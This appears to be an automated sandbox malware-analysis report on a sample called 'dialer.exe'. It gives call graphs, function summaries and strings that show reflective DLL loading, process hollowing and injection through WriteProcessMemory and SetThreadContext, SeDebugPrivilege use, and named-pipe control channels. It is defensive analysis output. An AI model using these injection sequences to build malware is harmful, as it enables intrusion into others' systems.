GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 FindCloseChangeNotification 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 FindCloseChangeNotification 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                                                                                                                                      • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                                                                                                                      • API String ID: 1970497257-1130149537
                                                                                                                                                                                                      • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                                                                                                      • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab FindCloseChangeNotification 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                                                                                                                      • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                                                                                                                                      • API String ID: 2998269048-3753927220
                                                                                                                                                                                                      • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                                                                                                      • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memorythreadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$Heap$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindLanguagesMemoryModulesNotificationOpenPreferredProcessesReadRestoreThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2219672174-0
                                                                                                                                                                                                      • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                                                                                                      • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3197395349-0
                                                                                                                                                                                                      • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                                                                                                      • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: FindCloseChangeNotification.KERNELBASE ref: 000000014000161D
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: RtlDeleteBoundaryDescriptor.NTDLL ref: 000000014000163D
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                                                                                                                                        • Part of subcall function 00000001400014D8: RtlRestoreThreadPreferredUILanguages.NTDLL ref: 0000000140001651
                                                                                                                                                                                                      • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                                                                                                                                      • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$Heap$AllocCloseEnumOpen$AllocateBoundaryChangeDeleteDescriptorFindHandleLanguagesMemoryModulesNotificationPreferredProcessesReadRestoreTerminateThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3158079169-0
                                                                                                                                                                                                      • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                                                                                                      • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                                                                                                                                                                      • String ID: .text$C:\Windows\System32\
                                                                                                                                                                                                      • API String ID: 1125510917-832442975
                                                                                                                                                                                                      • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                                                                                                                                      • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                                                                                      • String ID: M$\\.\pipe\dialerchildproc64
                                                                                                                                                                                                      • API String ID: 2203880229-3489460547
                                                                                                                                                                                                      • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                                                                                                                                      • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                                                                                                      • API String ID: 2071455217-3440882674
                                                                                                                                                                                                      • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                                                                                                                                      • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3676546796-0
                                                                                                                                                                                                      • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                                                                                                      • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb FindCloseChangeNotification 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3805842350-0
